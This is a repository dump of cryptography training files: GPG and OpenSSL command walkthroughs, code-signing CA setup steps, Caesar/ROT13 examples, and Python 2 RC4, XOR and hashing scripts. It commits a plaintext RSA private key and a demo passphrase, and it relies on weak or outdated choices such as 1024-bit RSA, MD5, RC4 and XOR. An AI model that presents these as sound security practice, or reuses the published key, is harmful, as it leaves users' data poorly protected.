DRKkvP60sejaa3JEPtQNLrZz+7Cz5gWkJ3jgab4eOcTXdGfjQSTL2xMeowWNfHC9 23 | +seAAYGEnBjFZ40sELUAEQEAAYkBHwQYAQIACQUCV3anLwIbDAAKCRAXkjihxztW 24 | Zz48B/9qI0859iUcNfaiPEjKSJl5ACaQNnTGReDgevegYhmPUocY8kghbnMLAiQ3 25 | CAVJCa7qzUIwRLMvYkAc+ms4JTP9CF9HdH095E5r1vAPlTobz9QzIdnXQ5qP95jL 26 | 
U4peNXIyhBfzvGUA0ANKfrTiJL/pvDFKdFRZUQmCboBMAvMS3lQ4Pv4tbLsI1Iq8 27 | SenL817ci9kmsNhasRmwf4SM2KpDHwUfS4uyZzfTjvZ554MJ/XXZ32CzZXATs9M9 28 | miXU/qKWEg6z2e/ggOinXqkCFx76av3m71SSbJVafkyvvKmtWFZr2tT8NBKoerau 29 | lPhM06xCj82BmxyUuF20OkWyCZ5n 30 | =MMD2 31 | -----END PGP PUBLIC KEY BLOCK----- 32 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/files.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/assmetrickey/files.tar.gz -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell1.txt: -------------------------------------------------------------------------------- 1 | Goodbye 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell2.txt: -------------------------------------------------------------------------------- 1 | Green 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell22.txt: -------------------------------------------------------------------------------- 1 | Green 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell3.txt: -------------------------------------------------------------------------------- 1 | blue 2 | -------------------------------------------------------------------------------- /trainings/crypto/encryption_demo.txt: -------------------------------------------------------------------------------- 1 | #################### 2 | # MD5 Hashing Demo # 3 | 
#################### 4 | mkdir ~/demo 5 | cd ~/demo 6 | 7 | 8 | 9 | mkdir hashdemo 10 | cd hashdemo 11 | echo test > test.txt 12 | cat test.txt 13 | md5sum test.txt 14 | echo hello >> test.txt 15 | cat test.txt 16 | md5sum test.txt 17 | cd .. 18 | 19 | 20 | 21 | ################################# 22 | # Symmetric Key Encryption Demo # 23 | ################################# 24 | md5sum test.txt 25 | mkdir gpgdemo 26 | cd gpgdemo 27 | echo test > test.txt 28 | cat test.txt 29 | gpg -c test.txt 30 | password 31 | password 32 | ls | grep test 33 | cat test.txt 34 | cat test.txt.gpg 35 | rm -rf test.txt 36 | ls | grep test 37 | gpg -o output.txt test.txt.gpg 38 | 39 | 40 | ################################## 41 | # Asymmetric Key Encryption Demo # 42 | ################################## 43 | 44 | sudo apt-get install rng-tools 45 | 46 | /etc/init.d/rng-tools start 47 | 48 | sudo rngd -r /dev/urandom 49 | santhosh 50 | 51 | 52 | echo hello > file1.txt 53 | echo goodbye > file2.txt 54 | echo green > file3.txt 55 | echo blue > file4.txt 56 | 57 | tar czf files.tar.gz *.txt 58 | 59 | gpg --gen-key 60 | 1 61 | 1024 62 | 0 63 | y 64 | Hellboy reboot 65 | Hellboy@reboot.com 66 | --blank comment-- 67 | O 68 | password 69 | password 70 | 71 | 72 | 73 | gpg --armor --output file-enc-pubkey.txt --export 'Hellboy reboot' 74 | 75 | cat file-enc-pubkey.txt 76 | 77 | gpg --armor --output file-enc-privkey.asc --export-secret-keys 'Hellboy reboot' 78 | 79 | cat file-enc-privkey.asc 80 | 81 | gpg --encrypt --recipient 'Hellboy reboot' files.tar.gz 82 | 83 | rm -rf files.tar.gz *.txt 84 | 85 | tar -zxvf files.tar.gz.gpg 86 | 87 | gpg --output output.tar.gz --decrypt files.tar.gz.gpg 88 | password 89 | 90 | tar -zxvf output.tar.gz 91 | 92 | 93 | ############################ 94 | # Encryption using OpenSSL # 95 | ############################ 96 | openssl genrsa -out private_key.pem 1024 97 | openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout 98 | 99 | 100 | echo hello > 
encrypt.txt 101 | openssl rsautl -encrypt -inkey public_key.pem -pubin -in encrypt.txt -out encrypt.dat 102 | 103 | cat encrypt.dat 104 | 105 | rm -rf encrypt.dat 106 | 107 | openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt 108 | 109 | cat decrypt.txt 110 | -------------------------------------------------------------------------------- /trainings/crypto/gpgdemo/hell.txt.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/gpgdemo/hell.txt.gpg -------------------------------------------------------------------------------- /trainings/crypto/gpgdemo/out.txt: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /trainings/crypto/hash.py: -------------------------------------------------------------------------------- 1 | #Author: P3t3rp4rk3r 2 | #Access Code: 3 | # Training Session 4 | 5 | import hashlib 6 | print "[+] Hashing [+]" 7 | msg = raw_input("Enter the Message:") 8 | print "[+] List of Hashs " 9 | print hashlib.algorithms 10 | a = raw_input("Enter the Hash:") 11 | h = hashlib.new(a) 12 | h.update(msg) 13 | print "[+]"+a+"sum:"+h.hexdigest() 14 | print "[+] Execution done." 
15 | 16 | -------------------------------------------------------------------------------- /trainings/crypto/hashdemo/hell.txt: -------------------------------------------------------------------------------- 1 | test 2 | hello 3 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/a.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/openssl/aes/a.enc -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/a.txt: -------------------------------------------------------------------------------- 1 | Santhosh Baswa 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/intro.txt: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -in attack-plan.txt -out message.enc 2 | 3 | openssl aes-256-cbc -d -in message.enc -out plain-text.txt 4 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/intro.txt~: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -in attack-plan.txt -out message.enc 2 | 3 | openssl aes-256-cbc -d -in message.enc -out plain-text.txt 4 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/output.txt: -------------------------------------------------------------------------------- 1 | Santhosh Baswa 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/ca/intro.txt: -------------------------------------------------------------------------------- 1 | Generate root CA and Store as a ca.key 2 | 3 | openssl genrsa -out ca.key 4096 4 | 5 | create 
selfsigned root CA ca.crt 6 | 7 | openssl req -new -x509 -days 1826 -key ca.key -out ca.crt 8 | 9 | generate subordinate CA 10 | 11 | openssl genrsa -out ia.key 4096 12 | 13 | request a certificate for this subordinate CA 14 | 15 | openssl req -new -key ia.key -out ia.csr 16 | 17 | subordinate CA cert and get it signed by the root CA 18 | 19 | openssl x509 -req -days 730 -in ia.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out ia.crt 20 | 21 | subordinate cA key for authenticatecode signature with microsoft signtool , pkcs12 file. 22 | 23 | openssl pkcs12 -export -out ia.p12 -inkey ia.key -in ia.crt -chain -CAfile ca.crt 24 | 25 | PE file generated : ia.p12 26 | 27 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/ca/intro.txt~: -------------------------------------------------------------------------------- 1 | Generate root CA and Store as a ca.key 2 | 3 | openssl genrsa -out ca.key 4096 4 | 5 | create selfsigned root CA ca.crt 6 | 7 | openssl req -new -x509 -days 1826 -key ca.key -out ca.crt 8 | 9 | generate subordinate CA 10 | 11 | openssl genrsa -out ia.key 4096 12 | 13 | request a certificate for this subordinate CA 14 | 15 | openssl req -new -key ia.key -out ia.csr 16 | 17 | subordinate CA cert and get it signed by the root CA 18 | 19 | openssl x509 -req -days 730 -in ia.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out ia.crt 20 | 21 | subordinate cA key for authenticatecode signature with microsoft signtool , pkcs12 file. 
22 | 23 | openssl pkcs12 -export -out ia.p12 -inkey ia.key -in ia.crt -chain -CAfile ca.crt 24 | 25 | PE file generated : ia.p12 26 | 27 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/decrypt.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/encrypt.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/openssl/encrypt.dat -------------------------------------------------------------------------------- /trainings/crypto/openssl/encrypt.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/privatekey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXQIBAAKBgQDDr1IM9HtETEN74fSYOXoY+OEBdygoY/NANb7zgfIJdNu+WK2Q 3 | Z4D+s1aGnEX4hj0FhOxpgXW1dmhJ2hHy9IRSK2T+XfeQHbwm/cVBcw8zwHaLRzls 4 | qeF+wG8pAsr1tTItVea2dpF6K/X8bmX2zQP+3EQsGKsHu4xaV6n9c0AhxQIDAQAB 5 | AoGANzuLC0EOce6ctaDHaxf+EIJe8Azz9sKPbDY/WXf6GxUy2P0qsDGmxT1VVNVT 6 | IpyxKJemKvlxgfCT6xR0MIE3v4NCFam7366PxdLnTy2dNYRXBohezxRH+PMTAPIJ 7 | UyI/2xci9OSlYa3PaLn2fZKjhGo5YRs9jzjPbiNYdduSQhkCQQDlBQhU/SIUNMJK 8 | go+WvEA+nbQ2FA0rQfURPbqvOoPSyW9oJj6PQyalTZDWVxiEuV44b82Qybr3JBE6 9 | UMMzb4M7AkEA2rzy2sLjB2e5P8wQF/5uvSeoKPVw8dzUPHc1Z5mQCEmcz7EweGvh 10 | 8aYIUbzHoCf8pb4DoB4MU38+6wxRzaqe/wJBAJ+HIOWqqhlvIsOqLIEwQoQbcFOX 11 | JhEy0ZWf7TFwTjD/NcZTlZJPkVTmMfTMGH0jbnlbj9LCYqUSj5mSdlaW388CQQCA 12 | 2jl9YLx4SkO4Ly9z0u/NAaVvq1YDRADKNbcB9lYAa8yyFEDnTzXkMdhIvhoiYCvW 13 | Pt7H3auJLDYWJEW0D8RlAkANv2HZUvH7NNHyCzJ6QjdNpF2ZNMVWMSXkSn/3Np7n 14 | 
AHzVbo2ffWZT4jSHLYUMYH7IIv9pI1yYSbaaxcItHExx 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/pubkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDr1IM9HtETEN74fSYOXoY+OEB 3 | dygoY/NANb7zgfIJdNu+WK2QZ4D+s1aGnEX4hj0FhOxpgXW1dmhJ2hHy9IRSK2T+ 4 | XfeQHbwm/cVBcw8zwHaLRzlsqeF+wG8pAsr1tTItVea2dpF6K/X8bmX2zQP+3EQs 5 | GKsHu4xaV6n9c0AhxQIDAQAB 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/intro.txt: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -a -salt -in secrets.txt -out secrets.txt.enc 2 | 3 | openssl aes-256-cbc -d -a -in secrets.txt.enc -out secrets.txt.new 4 | 5 | 6 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/secrets.txt: -------------------------------------------------------------------------------- 1 | secrets are there 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/secrets.txt.new: -------------------------------------------------------------------------------- 1 | secrets are there 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/serects.txt.enc: -------------------------------------------------------------------------------- 1 | U2FsdGVkX19hVWHVUgRPw0UztmWiyfqRVzuFALdtyHxL7PNPxBEHN2r5Rww4547j 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/crypto_basic.txt: -------------------------------------------------------------------------------- 1 | ceaser cipher: 2 | # Caesar cipher encoding 3 | echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | 
tr '[A-Z]' '[X-ZA-W]' 4 | # output: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD 5 | # Caesar cipher decoding 6 | echo "QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD" | tr '[X-ZA-W]' '[A-Z]' 7 | # output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 8 | # Can also be adjusted to ROT13 instead 9 | echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | tr '[A-Z]' '[N-ZA-M]' 10 | # output: GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT 11 | echo "GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT" | tr '[N-ZA-M]' '[A-Z]' 12 | # output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 13 | # Case-sensitive version of ROT13 14 | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' 15 | 16 | XOR Encryption: 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /trainings/crypto/topics/des/a.txt: -------------------------------------------------------------------------------- 1 | echo 'this is the plain text' > plaintext.txt 2 | openssl enc -e -des3 -salt -in plaintext.txt -out ciphertext.bin 3 | 4 | hd ciphertext.bin 5 | 6 | openssl enc -d -des3 -in ciphertext.bin -out plaintext2.txt 7 | 8 | diff plaintext.txt plaintext2.txt 9 | 10 | 11 | -------------------------------------------------------------------------------- /trainings/crypto/topics/rc4/a.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Copyright (C) 2012 Bo Zhu http://about.bozhu.me 4 | Permission is hereby granted, free of charge, to any person obtaining a 5 | copy of this software and associated documentation files (the "Software"), 6 | to deal in the Software without restriction, including without limitation 7 | the rights to use, copy, modify, merge, publish, distribute, sublicense, 8 | and/or sell copies of the Software, and to permit persons to whom the 9 | Software is furnished to do so, subject to the following conditions: 10 | The above copyright notice and this permission notice shall be included in 11 | all copies or 
substantial portions of the Software. 12 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 13 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 14 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL 15 | THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 16 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 17 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 18 | DEALINGS IN THE SOFTWARE. 19 | """ 20 | def KSA(key): 21 | keylength = len(key) 22 | S = range(256) 23 | j = 0 24 | for i in range(256): 25 | j = (j + S[i] + key[i % keylength]) % 256 26 | S[i], S[j] = S[j], S[i] # swap 27 | return S 28 | def PRGA(S): 29 | i = 0 30 | j = 0 31 | while True: 32 | i = (i + 1) % 256 33 | j = (j + S[i]) % 256 34 | S[i], S[j] = S[j], S[i] # swap 35 | K = S[(S[i] + S[j]) % 256] 36 | yield K 37 | def RC4(key): 38 | S = KSA(key) 39 | return PRGA(S) 40 | if __name__ == '__main__': 41 | # test vectors are from http://en.wikipedia.org/wiki/RC4 42 | # ciphertext should be BBF316E8D940AF0AD3 43 | key = 'Key' 44 | plaintext = 'Plaintext' 45 | # ciphertext should be 1021BF0420 46 | #key = 'Wiki' 47 | #plaintext = 'pedia' 48 | # ciphertext should be 45A01F645FC35B383552544B9BF5 49 | #key = 'Secret' 50 | #plaintext = 'Attack at dawn' 51 | def convert_key(s): 52 | return [ord(c) for c in s] 53 | key = convert_key(key) 54 | keystream = RC4(key) 55 | import sys 56 | for c in plaintext: 57 | sys.stdout.write("%02X" % (ord(c) ^ keystream.next())) 58 | print 59 | -------------------------------------------------------------------------------- /trainings/crypto/topics/rc4/rc4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (C) 2012 Bo Zhu http://about.bozhu.me 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a 7 | copy of this software and 
associated documentation files (the "Software"), 8 | to deal in the Software without restriction, including without limitation 9 | the rights to use, copy, modify, merge, publish, distribute, sublicense, 10 | and/or sell copies of the Software, and to permit persons to whom the 11 | Software is furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL 19 | THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 21 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 22 | DEALINGS IN THE SOFTWARE. 23 | """ 24 | 25 | 26 | def KSA(key): 27 | keylength = len(key) 28 | 29 | S = range(256) 30 | 31 | j = 0 32 | for i in range(256): 33 | j = (j + S[i] + key[i % keylength]) % 256 34 | S[i], S[j] = S[j], S[i] # swap 35 | 36 | return S 37 | 38 | 39 | def PRGA(S): 40 | i = 0 41 | j = 0 42 | while True: 43 | i = (i + 1) % 256 44 | j = (j + S[i]) % 256 45 | S[i], S[j] = S[j], S[i] # swap 46 | 47 | K = S[(S[i] + S[j]) % 256] 48 | yield K 49 | 50 | 51 | def RC4(key): 52 | S = KSA(key) 53 | return PRGA(S) 54 | 55 | 56 | if __name__ == '__main__': 57 | # test vectors are from http://en.wikipedia.org/wiki/RC4 58 | 59 | # ciphertext should be BBF316E8D940AF0AD3 60 | key = 'Key' 61 | plaintext = 'Plaintext' 62 | 63 | # ciphertext should be 1021BF0420 64 | #key = 'Wiki' 65 | #plaintext = 'pedia' 66 | 67 | # ciphertext should be 45A01F645FC35B383552544B9BF5 68 | #key = 'Secret' 69 | #plaintext = 'Attack at dawn' 70 | 71 | def convert_key(s): 72 | return [ord(c) for c in s] 73 | key = convert_key(key) 74 
| 75 | keystream = RC4(key) 76 | 77 | import sys 78 | for c in plaintext: 79 | sys.stdout.write("%02X" % (ord(c) ^ keystream.next())) 80 | print 81 | -------------------------------------------------------------------------------- /trainings/crypto/topics/xor.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import XOR 2 | import base64 3 | 4 | def encrypt(key, plaintext): 5 | cipher = XOR.new(key) 6 | return base64.b64encode(cipher.encrypt(plaintext)) 7 | 8 | def decrypt(key, ciphertext): 9 | cipher = XOR.new(key) 10 | return cipher.decrypt(base64.b64decode(ciphertext)) 11 | plaintext = raw_input('Message:') 12 | key = raw_input('key:') 13 | ciphertext = encrypt(key,plaintext) 14 | print "Ciphertext:", ciphertext 15 | print "Plaintext:" , decrypt(key,ciphertext) 16 | 17 | --------------------------------------------------------------------------------
